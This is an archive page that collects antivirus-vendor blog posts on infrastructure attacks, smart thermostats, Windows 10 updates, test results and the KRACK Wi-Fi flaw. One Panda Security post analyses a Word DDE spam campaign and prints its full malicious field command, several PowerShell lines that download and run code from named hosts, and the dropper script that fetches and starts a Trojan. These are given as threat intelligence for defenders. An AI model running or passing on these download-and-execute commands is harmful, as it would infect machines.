Category Archives: Antivirus Vendors

Antivirus Vendors

US warns of ongoing attacks on energy firms and critical infrastructure

The US Department of Homeland Security and FBI have warned that hackers are actively targeting government departments, and firms working in the energy, nuclear, water, aviation, and critical manufacturing sectors.

The post US warns of ongoing attacks on energy firms and critical infrastructure appeared first on WeLiveSecurity

Read More

Turning up the heat on smart thermostats

Smart thermostats are near the top of many shopping lists of ‘must have’ devices for the connected homes. After all, who wouldn’t want the financial and energy efficiency advantages of a programmable device without all the installation headaches? But have you considered the security and privacy issues that they might involve? Smart goes mainstream Smart […]

The post Turning up the heat on smart thermostats appeared first on Avira Blog.

Read More

A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office and which was already actively being exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.

Behavior

The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “

 

Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which simple is analyzed, we can see that the download URL changes, despite the command being essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e

The following powershell script is downloaded and executed:

$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”

foreach($url in $urls){

Try

{

Write-Host $url

$fp = “$env:temprekakva32.exe”

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp

break

}

Catch

{

Write-Host $_.Exception.Message

}

}

From this URL:

hxxp://shamanic-extracts.biz/eurgf837or

And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:

0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168

The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.

Read More

Fall Creators, the new Windows 10 upgrade

Fluent Design is finally arriving to Windows 10

Earlier this year, Microsoft unveiled its Fluent Design System, a new design language for the Windows 10 interface, announcing at the same time a number of changes to the company’s software in the future. This week, the Redmond company has finally rolled out the first phase of the new system, as part of the Windows 10 Fall Creators Update.

The launch has been accompanied by a video showcasing some of the new design changes to Windows 10, although it doesn’t reveal much information about any of the future additions. The video offers a sneak peek of various components and apps that have been redesigned with new visual effects that aim to give Windows 10 more texture, depth and visual responsiveness to inputs. The new Fluent Design will roll out gradually, starting with its own apps and elements like the Start menu, Action Center and notifications. Microsoft has stated that these are just the first steps of the project and that new features and capabilities will be introduced in the future.

Fluent Design System is designed to be the successor to Microsoft’s Metro design and will appear across apps and services on Windows, iOS and Android. Microsoft is focusing on light, depth, motion and scale, with animations that add a sense of fluidity during interactions, in contrast to the minimalistic, tile-based interface of the past. Besides incorporating the first phase of Fluent Design System, Windows 10 Fall Creators Update also introduces OneDrive Files On-Demand, a new feature that allows users to access their documents without having to download them. Microsoft Edge has also been improved, incorporating a new tool to manage Favorites and the ability to import settings from Chrome. Finally, the operating system includes a new GPU monitoring option in the Task Manager.

More new features yet to come

We’re expecting to see even more changes in the next Windows 10 update, which is currently in development under the codename Redstone 4. Microsoft has started testing the initial features for this version, which is scheduled for March 2018. The main addition so far is a new Cortana Collections feature, which will see and remember users’ browsing habits. As Microsoft finishes its functionality tests, new information will be unveiled about the new improvements, in addition to a new Timeline feature that will let users resume sessions and apps on Windows PCs, iOS and Android devices more easily.

This update does not affect the operation of the Windows 10-compatible antivirus solutions available on the market, including the entire Panda Antivirus product line. So, installing a professional antivirus tool is not only possible, but highly recommended. In this context, the latest version of Panda’s antivirus solutions has the added guarantee of having achieved one of the best detection rates in the latest edition of the AV-Comparatives professional antivirus comparative review.

The post Fall Creators, the new Windows 10 upgrade appeared first on Panda Security Mediacenter.

Read More

More stars for Avira from AV-Comparatives

Avira won additional stars from AV-Comparatives in the independent agency’s latest Performance Test, Malware Protection Test and also had a top-level performance in the monthly Real World Protection Test. Avira Antvirus Pro received the AV-Comparatives highest Advanced+ *** rating in the latest Performance Test, placing in the top category of AV products with the least […]

The post More stars for Avira from AV-Comparatives appeared first on Avira Blog.

Read More

KRACK attack: beware of public Wi-Fi

Why can KRACK be so dangerous?

Cybersecurity experts have discovered a critical weakness in Wi-Fi connections that could make your private information vulnerable to cyber criminals. The threat is called KRACK (key reinstallation attacks) and could allow someone to steal information sent over your private Wi-Fi or any open connections you might access in public places like coffee shops.

KRACK is dangerous because it affects so many people. Most people who connect wirelessly to the internet through Wi-Fi on their phone, tablet, laptop, etc. do so using the WPA2 (Wi-Fi Protected Access) protocol that helps keep your information safe by encrypting it—making it a secret code. Only now, KRACK has made it much less protected because thieves may be able to decypher the code that protects your information, and read it whenever they want.

Cyber criminals can also use KRACK to modify wirelessly transmitted data to and from the websites you visit. You might think you’re going to your bank’s website, when in reality you’re at a fake phishing site made to look like it. You unknowingly enter your username and password, and the thieves now can record that information.

How do I protect myself?

Update your operating system

Update your OS ASAP. In the meantime, Apple, Google and others are presumably working to roll out a patch to protect against KRACK.

Microsoft just announced it included a patch in an October 10th security update. For Windows customers who have their “Windows Update enabled and applied the security updates,” they’re automatically protected from the KRACK threat, according to Windows Central.

However, don’t assume you’re protected. Even if you’re a Windows user, double check you have the latest security updates.

Use Wi-Fi networks only when necessary

Until you’ve installed the security KRACK patch, avoid using Wi-Fi connections, both at home and especially public hotspots. Your home Wi-Fi connection is slightly more secure only because cyber thieves need to be relatively close to your physical location to steal your data. But that doesn’t mean you’re safe at home or in public.

If you absolutely need to use a wireless network, make sure you’re not transmitting confidential info like your SSN, credit card number, or bank information.

If possible, hardwire your wirelessly connected devices back to your modem/router. Cyber criminals can’t steal signals out of the air if they’re not there, so find that yellow ethernet cable you stashed somewhere in a drawer and use it to connect to as many devices as possible.

Update your wireless router’s firmware

Your router’s firmware helps it work correctly with your devices, so keep it up-to-date. When the security patch rolls out, you don’t want any issues with conflicting or unsupported firmware versions. Updating your router’s firmware is a relatively painless process.

Configure your router so only your approved devices can connect to the network. Each of your devices has a media access control (MAC) address that uniquely identifies it to work with the network. Configure your router to only allow listed devices. The process may differ depending on your router brand.

Hide your Wi-Fi network so even those close enough to detect your signal won’t see it listed. Hiding your network won’t stop dedicated hackers from eventually finding it, but it will create another step they must go through, which is your goal until the patch comes through. It’s likely it will take developers some time to adequately address KRACK, so stay vigilant.

Avoid unencrypted websites

Encrypted websites contain an HTTPS at the beginning of their URL’s. The information you send and receive to them is secure. Websites that only use the HTTP are NOT encrypted. So use HTTPS sites as much as possible. HTTPS Everywhere is a browser plugin that automatically switches thousands of sites from HTTP to HTTPS.

Get some good cybersecurity software

Having cybersecurity software always helps mitigate risk. For critical attacks like KRACK, it’s especially important to add as many layers of protection as possible.

What information can be stolen?

Anything you can send wirelessly over the internet. So, pretty much everything. Passwords, credit card numbers, voice messages, pictures, texts, and the like. Again, this goes for both public and private wireless networks, so your info could be stolen while you’re signed in to the library’s Wi-Fi network or when you’re texting someone from your living room. Deactivate your cell phone’s Wi-Fi connection until you’ve gotten the fix from your OS developer or stay on 3G network for data transfer.

Can it affect my devices?

Strictly speaking, no. Neither your wirelessly connected devices nor your router are being directly targeted. Unlike ransomware, thieves aren’t KRACKing into your device and threatening to destroy your information. It’s more of an elaborate heist job than a hostage situation. They want to decrypt the protocol, to eavesdrop on what your devices are saying. They’re interested in the info not who is talking. More importantly, thieves want to go unnoticed.

How did the KRACK vulnerability happen?

Your cell phone and Wi-Fi device (i.e. modem) need to “talk” to each other decide on how to work together transmit data. The language they use is called a protocol, or system of rules. The protocol is encrypted for privacy. It’s like if two people switched to a different language to discuss something privately. If you don’t know the language, you’re in the dark. That’s how your information is kept private when sent over Wi-Fi.

But the KRACK attack gives cyber criminals an opening to decrypt the information sent. It would be like someone bringing an interpreter to the couple’s private discussion. They now can overhear everything that’s being said.

Can I tell if someone’s stealing my info over Wi-Fi?

As of yet, there’s no way to know if someone is KRACKing your wireless access. That’s why it’s especially important to keep an eye out for an update, and to follow the safety recommendations above.

 

 

The post KRACK attack: beware of public Wi-Fi appeared first on Panda Security Mediacenter.

Read More